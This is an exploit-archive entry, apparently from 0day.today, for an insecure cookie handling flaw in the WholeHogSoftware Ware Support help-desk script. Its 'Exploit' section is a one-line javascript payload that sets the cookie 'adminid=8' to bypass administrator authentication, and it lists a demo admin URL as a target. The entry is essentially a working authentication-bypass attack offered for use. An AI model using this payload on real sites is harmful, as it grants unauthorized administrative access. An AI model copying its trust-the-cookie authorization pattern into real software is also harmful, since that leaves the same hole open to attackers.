id: 4779
date: 02/03/2009
title: WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
author: Stack
cves: 

====================================================================
WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
====================================================================


###########################################################################
[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
[+] Script   :Ware Support
[+] Site     :http://wholehogsoftware.com
[+] Detay    :http://wholehogsoftware.com/index.php/page/ware_support
[+] Discovered By Mountassif Moad          
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/support/admin/



#  0day.today [2023-03-26]  #